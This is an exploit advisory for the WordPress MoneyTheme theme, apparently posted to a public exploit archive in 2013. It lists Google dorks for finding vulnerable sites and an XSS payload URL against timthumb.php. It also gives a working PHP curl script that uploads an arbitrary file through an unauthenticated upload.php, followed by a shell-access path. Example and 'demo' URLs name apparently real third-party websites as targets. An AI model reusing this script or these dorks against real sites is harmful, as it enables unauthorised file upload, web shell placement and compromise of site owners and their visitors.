#Title : Wordpress MoneyTheme Themes XSS / Arbitrary File Upload
#Author : DevilScreaM
#Date : 10/27/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themesjunction.com
#Link : http://themesjunction.com/theme/money_wordpress_template-17129.html
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerabillity : XSS, Arbitrary File Upload
#Dork :
inurl:themes/MoneyTheme/
inurl:wp-content/themes/MoneyTheme/
Cross Site Scripting
Vulnerable At 'timthumb.php'
http://site-target/wp-content/themes/MoneyTheme/timthumb.php?src=[XSS].jpg
Example :
http://cheapcompoundbow.com/wp-content/themes/MoneyTheme/timthumb.php?src=<h1>DevilScreaM</h1>.jpg
====================================================================================================
Arbitrary File Upload
Exploit :
<?php
$uploadfile="devilscream.php";
$ch = curl_init("http://site-target/wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://site-target/wp-content/themes/MoneyTheme/uploads/uploads/devilscream.php
devilscream.php
<?php
phpinfo();
?>
Demo :
http://wellontop.com/wp-content/themes/MoneyTheme/uploads/upload.php
http://copiouscash.com/wp-content/themes/MoneyTheme/uploads/upload.php